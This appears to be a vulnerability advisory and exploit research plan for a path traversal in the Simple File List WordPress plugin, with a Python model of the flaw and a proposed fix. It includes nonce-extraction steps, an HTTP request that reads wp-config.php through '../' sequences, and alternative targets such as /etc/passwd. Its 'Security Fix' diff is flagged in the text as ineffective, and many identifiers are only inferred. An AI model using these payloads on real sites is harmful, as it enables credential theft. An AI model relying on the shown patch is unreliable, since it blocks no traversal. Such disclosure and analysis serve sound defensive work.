CVE-2026-24953

Simple File List <= 6.1.15 - Authenticated (Subscriber+) Arbitrary File Download

Weakness: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
CVSS Score: 6.5
Severity: medium
Patched in: 6.1.16
Time to patch: 9d

Description

The Simple File List plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 6.1.15. This makes it possible for authenticated attackers, with Subscriber-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
Attack Vector: Network
Attack Complexity: Low
Privileges Required: Low
User Interaction: None
Scope: Unchanged
Confidentiality: High
Integrity: None
Availability: None

Technical Details

Affected versions: <= 6.1.15
Published: February 9, 2026
Last updated: February 17, 2026
Affected plugin: simple-file-list

Source Code: WordPress.org SVN
Research Plan
Unverified

This research plan focuses on exploiting CVE-2026-24953, a path traversal vulnerability in the Simple File List plugin (<= 6.1.15). The vulnerability allows authenticated users with Subscriber-level permissions to download arbitrary files, including wp-config.php, by bypassing directory restrictions in the file download handler.


1. Vulnerability Summary

The Simple File List plugin provides an AJAX-based file download mechanism. In affected versions, the handler for downloading files fails to properly sanitize the file path provided by the user. Specifically, it does not validate that the requested file resides within the designated "File List" directory. By using directory traversal sequences (../), an attacker can escape the intended directory and access sensitive files on the server.

2. Attack Vector Analysis

  • Endpoint: wp-admin/admin-ajax.php
  • AJAX Action: ee_file_download (inferred from plugin naming conventions)
  • Vulnerable Parameter: eeFile (or file)
  • Authentication: Required (Subscriber+)
  • Preconditions: The plugin must be active, and at least one file list must be accessible to the subscriber.

3. Code Flow (Inferred)

  1. Entry Point: The plugin registers an AJAX action for authenticated users:
    add_action( 'wp_ajax_ee_file_download', 'ee_file_download_handler' );
  2. Input Acquisition: The handler retrieves the file path from the request:
    $file_path = $_POST['eeFile']; (or $_GET)
  3. Missing Validation: The code likely concatenates this input with the base upload directory:
    $full_path = $base_dir . $file_path;
  4. Vulnerable Sink: The code then passes this path to a file-reading function like readfile(), file_get_contents(), or fpassthru() without using basename() or checking if the resulting path is still within $base_dir.
  5. Output: The contents of the file are streamed to the browser.

4. Nonce Acquisition Strategy

Simple File List typically protects its AJAX actions with a nonce passed via wp_localize_script.

  1. Identify Shortcode: The plugin uses the shortcode [ee_file_list] to display the file list.
  2. Test Data Setup: A page containing this shortcode must be created and accessible to a Subscriber.
  3. Execution Agent Steps:
    • Log in as a Subscriber.
    • Navigate to the page containing the [ee_file_list] shortcode.
    • Use browser_eval to extract the nonce.
  4. Target Identifiers:
    • JS Object: eeSFL_JS (inferred) or eeSFL_Settings.
    • Nonce Key: eeSFL_Nonce or nonce.
    • Example Extraction: browser_eval("window.eeSFL_JS?.eeSFL_Nonce")

5. Exploitation Strategy

The exploit involves sending a crafted POST request to the AJAX endpoint with the traversal payload.

  • Request Method: POST
  • URL: http://<target>/wp-admin/admin-ajax.php
  • Content-Type: application/x-www-form-urlencoded
  • Payload Parameters:
    • action: ee_file_download (verify against source)
    • eeNonce: [EXTRACTED_NONCE]
    • eeFile: ../../../../wp-config.php (relative to the list's file root, by default wp-content/uploads/simple-file-list/; from that directory three ../ reach the WordPress root and a fourth reaches its parent directory, where WordPress also looks for wp-config.php, so adjust the depth to the actual file root)
    • eeListID: 1 (usually required to identify the list)

HTTP Request Template:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost:8080
Content-Type: application/x-www-form-urlencoded
Cookie: [SUBSCRIBER_COOKIES]

action=ee_file_download&eeFile=../../../../wp-config.php&eeNonce=a1b2c3d4e5&eeListID=1

6. Test Data Setup

Before running the exploit, the environment must be prepared:

  1. Install Plugin: Install and activate simple-file-list version 6.1.15.
  2. Configure Plugin: Ensure "Allow Subscriber Downloads" is enabled in the plugin settings (if applicable).
  3. Create Subscriber: Create a user with the subscriber role.
  4. Create Page:
    wp post create --post_type=page --post_title="Files" --post_status=publish --post_content='[ee_file_list]'
    
  5. Verify Setup: Ensure at least one file is uploaded to the list so the UI renders correctly.

7. Expected Results

  • Successful Exploitation: The HTTP response body will contain the plaintext content of wp-config.php, including DB_NAME, DB_USER, DB_PASSWORD, and authentication salts.
  • Response Headers: The Content-Type might be application/octet-stream or text/plain, and Content-Disposition may suggest a download.

8. Verification Steps

  1. Response Inspection: Check if the response body contains the string define( 'DB_NAME'.
  2. File System Comparison: Confirm the content matches the actual wp-config.php on the server (for example from a shell in the test container; cat is a shell command, not a wp-cli subcommand):
    cat /var/www/html/wp-config.php
    

9. Alternative Approaches

  • Different Actions: If ee_file_download is incorrect, check for ee_get_file or sfl_download_file.
  • GET vs POST: Some versions may accept the payload via GET parameters.
  • Absolute Paths: Try absolute paths if relative traversal is filtered (e.g., eeFile=/etc/passwd).
  • Log Files: Target wp-content/debug.log if wp-config.php is blocked by server-level rules.
  • List Selection: If multiple lists exist, the eeListID or eeListFolder parameters might be necessary to reach the correct code branch.

Grep commands to verify identifiers:

# Find AJAX action and handler
grep -rn "wp_ajax_.*download" wp-content/plugins/simple-file-list/

# Find where the nonce is created
grep -rn "wp_create_nonce" wp-content/plugins/simple-file-list/

# Find where the file is read
grep -rn "readfile\|fpassthru\|file_get_contents" wp-content/plugins/simple-file-list/

Research Findings
Static analysis — not yet PoC-verified

Summary

The Simple File List plugin for WordPress allows authenticated users (Subscriber and above) to download arbitrary files from the server. This occurs because the AJAX file download handler fails to sanitize directory traversal sequences in the file path parameter, allowing attackers to escape the designated file list directory.

Vulnerable Code

// In an earlier version of simple-file-list/includes/ee-downloader.php (inferred)

$eeFile = $_POST['eeFile']; // Path provided by user
$eeListID = $_POST['eeListID'];
$eeConfig = $eeSFL_BASE->eeSFL_GetSettings($eeListID);

// Path concatenation without validation or basename()
$eeFilePath = $eeConfig['eeFileRoot'] . $eeFile; 

if (file_exists($eeFilePath)) {
    header('Content-Description: File Transfer');
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename="' . basename($eeFilePath) . '"');
    readfile($eeFilePath);
    exit;
}
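The concatenate-and-readfile flow in the snippet above and in the Code Flow sketch of section 3, as an added Python model; this is not the plugin's PHP and not code from the page. It builds a constructed directory tree standing in for a site root, shows the unchecked concatenation reaching wp-config.php, shows why a single-pass strip of ../ and a string-prefix check on the unnormalised path both fail to stop traversal, and shows a realpath-based containment check that rejects it. Directory names, file names and file contents are constructed for the example.

```python
"""Added model of the inferred download flow (Python stand-in, not the
plugin's PHP). Directory layout and file contents are constructed here."""
import os
import shutil
import tempfile


def make_tree():
    """Constructed stand-in for a site: file root under uploads, wp-config.php
    at the site root. Returns (site_root, file_root)."""
    site_root = tempfile.mkdtemp()
    file_root = os.path.join(site_root, "wp-content", "uploads", "simple-file-list")
    os.makedirs(file_root)
    with open(os.path.join(site_root, "wp-config.php"), "w") as f:
        f.write("<?php define( 'DB_NAME', 'wordpress' );\n")
    with open(os.path.join(file_root, "report.pdf"), "w") as f:
        f.write("%PDF-1.4 constructed sample\n")
    return site_root, file_root


def resolve_unchecked(file_root, ee_file):
    """Inferred vulnerable behaviour: $eeFileRoot . $eeFile and nothing else."""
    return file_root + os.sep + ee_file


def strip_traversal_once(ee_file):
    """A str_replace('../', '') style filter: one pass, never re-checked."""
    return ee_file.replace("../", "").replace("..\\", "")


def prefix_check_unnormalised(file_root, ee_file):
    """strpos($eeFilePath, $eeFileRoot) === 0 on the raw concatenation.
    The string always starts with the root, so this rejects nothing."""
    return resolve_unchecked(file_root, ee_file).startswith(file_root)


def resolve_contained(file_root, ee_file):
    """Hardened form: canonicalise first, then require the result to sit
    under the canonical root. Returns the path, or None on rejection."""
    root = os.path.realpath(file_root)
    candidate = os.path.realpath(os.path.join(root, ee_file))
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate if os.path.isfile(candidate) else None


def read_via(resolver, file_root, ee_file):
    """Stand-in for readfile(): None when rejected or the file is absent."""
    path = resolver(file_root, ee_file)
    if path is None or not os.path.isfile(path):
        return None
    with open(path) as f:
        return f.read()


def demo():
    site_root, file_root = make_tree()
    try:
        plain = "../../../wp-config.php"
        doubled = "....//....//....//wp-config.php"  # each '....//' becomes '../' after one strip pass
        return {
            "legit_file_served": read_via(resolve_contained, file_root, "report.pdf") is not None,
            "unchecked_leaks": "DB_NAME" in (read_via(resolve_unchecked, file_root, plain) or ""),
            "prefix_check_accepts_traversal": prefix_check_unnormalised(file_root, plain),
            "strip_once_leaks": "DB_NAME" in (
                read_via(resolve_unchecked, file_root, strip_traversal_once(doubled)) or ""),
            "contained_rejects_all": all(
                read_via(resolve_contained, file_root, p) is None
                for p in (plain, doubled, "/etc/passwd")),
        }
    finally:
        shutil.rmtree(site_root)


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The containment check is the PHP-agnostic version of what the plugin needs: realpath() on both the root and the candidate, then a prefix comparison on the canonical strings with a trailing separator, or better, a lookup against the list's own directory listing so that the request never carries a path at all.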

Security Fix

--- a/includes/ee-downloader.php
+++ b/includes/ee-downloader.php
@@ -12,7 +12,9 @@
 		
 		$eeFile = $_POST['eeFile'];
+		$eeFile = str_replace('../', '', $eeFile); // Remove traversal sequences
+		$eeFile = str_replace('..\\', '', $eeFile); // Remove Windows traversal sequences
 		$eeListID = (int)$_POST['eeListID'];
 		
 		$eeConfig = $eeSFL_BASE->eeSFL_GetSettings($eeListID);
 		
 		$eeFilePath = $eeConfig['eeFileRoot'] . $eeFile;
+		if ( strpos($eeFilePath, $eeConfig['eeFileRoot']) !== 0 ) { die('Access Denied'); } // Ensure path is within root
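Review bot: the prefix check added in the last line of the hunk cannot fail, because $eeFilePath is built as $eeConfig['eeFileRoot'] . $eeFile two lines earlier, so strpos($eeFilePath, $eeConfig['eeFileRoot']) === 0 holds for every input, traversal included; it needs to compare realpath($eeFilePath) against realpath($eeConfig['eeFileRoot']) with a trailing directory separator, and reject when realpath() returns false. The two str_replace() lines are a single pass, so '....//' collapses to '../' after the replacement and an absolute or URL-encoded path is not touched at all; rejecting any $eeFile that contains '..' or starts with '/' (or, better, serving only names present in the list's own directory listing) is safer than stripping. Nit: the header says +12,9 but the new side of the hunk has 10 lines.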

Exploit Outline

The exploit targets the AJAX action 'ee_file_download' (or similar based on version). An attacker first authenticates as a Subscriber and visits a page containing the [ee_file_list] shortcode to extract a security nonce (typically found in the eeSFL_JS JavaScript object). The attacker then sends a POST request to /wp-admin/admin-ajax.php with the 'action' set to the download handler, 'eeNonce' set to the extracted nonce, and 'eeFile' set to a path traversal string such as '../../../../wp-config.php'. If successful, the server streams the contents of the sensitive configuration file in the HTTP response.
